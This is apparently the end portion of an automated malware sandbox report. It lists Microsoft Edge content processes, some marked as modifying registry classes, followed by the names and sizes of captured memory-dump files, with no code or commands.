                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                        PID:5076
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4704
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:3836
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:4836
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:4524
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                            PID:4624

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v6

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • memory/788-434-0x0000020AD6A60000-0x0000020AD6AD1000-memory.dmp

                                                                                            Filesize

                                                                                            452KB

                                                                                          • memory/1056-429-0x00000230BB2D0000-0x00000230BB341000-memory.dmp

                                                                                            Filesize

                                                                                            452KB

                                                                                          • memory/1164-172-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                            Filesize

                                                                                            436KB

                                                                                          • memory/1224-389-0x00000000015A4000-0x00000000015A5000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1224-388-0x00000000015A2000-0x00000000015A4000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1224-387-0x00000000015A0000-0x00000000015A2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/1500-146-0x00000000032D0000-0x00000000032D5000-memory.dmp

                                                                                            Filesize

                                                                                            20KB

                                                                                          • memory/1500-147-0x00000000032C0000-0x00000000032C9000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/1548-158-0x00000000003D0000-0x00000000003D5000-memory.dmp

                                                                                            Filesize

                                                                                            20KB

                                                                                          • memory/1548-159-0x00000000003C0000-0x00000000003C9000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/1736-149-0x0000000000B60000-0x0000000000B66000-memory.dmp

                                                                                            Filesize

                                                                                            24KB

                                                                                          • memory/1736-150-0x0000000000B50000-0x0000000000B5C000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/1840-185-0x00000000004A0000-0x00000000004B3000-memory.dmp

                                                                                            Filesize

                                                                                            76KB

                                                                                          • memory/1840-186-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                            Filesize

                                                                                            320KB

                                                                                          • memory/2000-371-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                            Filesize

                                                                                            328KB

                                                                                          • memory/2068-141-0x0000000001220000-0x0000000001229000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/2068-142-0x0000000001210000-0x000000000121F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/2100-138-0x00000000032C0000-0x00000000032CB000-memory.dmp

                                                                                            Filesize

                                                                                            44KB

                                                                                          • memory/2100-137-0x00000000032D0000-0x00000000032D7000-memory.dmp

                                                                                            Filesize

                                                                                            28KB

                                                                                          • memory/2180-204-0x0000000002E60000-0x0000000003786000-memory.dmp

                                                                                            Filesize

                                                                                            9.1MB

                                                                                          • memory/2180-206-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                                            Filesize

                                                                                            9.3MB

                                                                                          • memory/2352-183-0x00000000016E0000-0x00000000016E2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2492-431-0x000001A97E140000-0x000001A97E1B1000-memory.dmp

                                                                                            Filesize

                                                                                            452KB

                                                                                          • memory/2776-382-0x00000000025B0000-0x00000000025B2000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2836-428-0x000001FE52570000-0x000001FE525E1000-memory.dmp

                                                                                            Filesize

                                                                                            452KB

                                                                                          • memory/2836-427-0x000001FE51EA0000-0x000001FE51EEC000-memory.dmp

                                                                                            Filesize

                                                                                            304KB

                                                                                          • memory/2916-156-0x0000000000BF0000-0x0000000000BF9000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/2916-155-0x0000000000E80000-0x0000000000E85000-memory.dmp

                                                                                            Filesize

                                                                                            20KB

                                                                                          • memory/3016-118-0x00000000012D0000-0x00000000012E7000-memory.dmp

                                                                                            Filesize

                                                                                            92KB

                                                                                          • memory/3016-160-0x0000000001310000-0x0000000001326000-memory.dmp

                                                                                            Filesize

                                                                                            88KB

                                                                                          • memory/3016-377-0x00000000033A0000-0x00000000033B6000-memory.dmp

                                                                                            Filesize

                                                                                            88KB

                                                                                          • memory/3024-143-0x00000000004B0000-0x00000000004B9000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/3024-144-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                            Filesize

                                                                                            328KB

                                                                                          • memory/3028-173-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-240-0x0000000004A50000-0x0000000004A51000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-237-0x0000000004A90000-0x0000000004A91000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-254-0x0000000004A84000-0x0000000004A86000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/3180-238-0x00000000025F0000-0x0000000002609000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/3180-252-0x0000000005780000-0x0000000005781000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-241-0x00000000055A0000-0x00000000055A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-243-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                            Filesize

                                                                                            396KB

                                                                                          • memory/3180-242-0x0000000001F80000-0x0000000001FAF000-memory.dmp

                                                                                            Filesize

                                                                                            188KB

                                                                                          • memory/3180-244-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-239-0x0000000004F90000-0x0000000004F91000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-245-0x0000000004A82000-0x0000000004A83000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-236-0x00000000023E0000-0x00000000023FB000-memory.dmp

                                                                                            Filesize

                                                                                            108KB

                                                                                          • memory/3180-246-0x0000000004A83000-0x0000000004A84000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3180-248-0x00000000055F0000-0x00000000055F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3356-132-0x00000000032C0000-0x000000000332B000-memory.dmp

                                                                                            Filesize

                                                                                            428KB

                                                                                          • memory/3356-131-0x0000000003330000-0x00000000033A4000-memory.dmp

                                                                                            Filesize

                                                                                            464KB

                                                                                          • memory/3420-306-0x00000000055A0000-0x0000000005653000-memory.dmp

                                                                                            Filesize

                                                                                            716KB

                                                                                          • memory/3420-305-0x00000000053F0000-0x00000000054DE000-memory.dmp

                                                                                            Filesize

                                                                                            952KB

                                                                                          • memory/3420-301-0x00000000034B0000-0x00000000034B1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3496-114-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/3500-397-0x0000026D65850000-0x0000026D65851000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3500-396-0x0000026D659A0000-0x0000026D659A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3500-395-0x0000026D65980000-0x0000026D65981000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3572-249-0x0000000000A00000-0x0000000000A15000-memory.dmp

                                                                                            Filesize

                                                                                            84KB

                                                                                          • memory/3624-126-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                            Filesize

                                                                                            584KB

                                                                                          • memory/3624-125-0x0000000002170000-0x0000000002201000-memory.dmp

                                                                                            Filesize

                                                                                            580KB

                                                                                          • memory/3752-153-0x0000000000A00000-0x0000000000A09000-memory.dmp

                                                                                            Filesize

                                                                                            36KB

                                                                                          • memory/3752-152-0x0000000000A10000-0x0000000000A14000-memory.dmp

                                                                                            Filesize

                                                                                            16KB

                                                                                          • memory/3756-164-0x0000000000400000-0x0000000000651000-memory.dmp

                                                                                            Filesize

                                                                                            2.3MB

                                                                                          • memory/3756-192-0x0000000003580000-0x0000000003590000-memory.dmp

                                                                                            Filesize

                                                                                            64KB

                                                                                          • memory/3756-219-0x0000000004C00000-0x0000000004C08000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3756-209-0x0000000004CA0000-0x0000000004CA8000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3756-207-0x0000000004960000-0x0000000004968000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3756-198-0x0000000003720000-0x0000000003730000-memory.dmp

                                                                                            Filesize

                                                                                            64KB

                                                                                          • memory/3756-215-0x0000000004CB0000-0x0000000004CB8000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3756-220-0x0000000003580000-0x00000000035E0000-memory.dmp

                                                                                            Filesize

                                                                                            384KB

                                                                                          • memory/3756-218-0x0000000004CB0000-0x0000000004CB8000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3756-266-0x0000000003AA0000-0x0000000003B00000-memory.dmp

                                                                                            Filesize

                                                                                            384KB

                                                                                          • memory/3756-217-0x0000000004C00000-0x0000000004C08000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/3788-134-0x00000000007F0000-0x00000000007F7000-memory.dmp

                                                                                            Filesize

                                                                                            28KB

                                                                                          • memory/3788-135-0x00000000007E0000-0x00000000007EC000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/4040-255-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                            Filesize

                                                                                            320KB

                                                                                          • memory/4060-116-0x00000000005C0000-0x00000000005CC000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/4776-423-0x0000000004EDF000-0x0000000004FE0000-memory.dmp

                                                                                            Filesize

                                                                                            1.0MB

                                                                                          • memory/4776-425-0x00000000037F0000-0x000000000384D000-memory.dmp

                                                                                            Filesize

                                                                                            372KB

                                                                                          • memory/4876-408-0x00000210EB0F0000-0x00000210EB0F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4876-402-0x00000208EA310000-0x00000208EA311000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4876-403-0x00000208EA330000-0x00000208EA331000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4876-409-0x00000210EB0E0000-0x00000210EB0E1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4876-404-0x00000208EA380000-0x00000208EA381000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4956-433-0x000001EE27C50000-0x000001EE27CC1000-memory.dmp

                                                                                            Filesize

                                                                                            452KB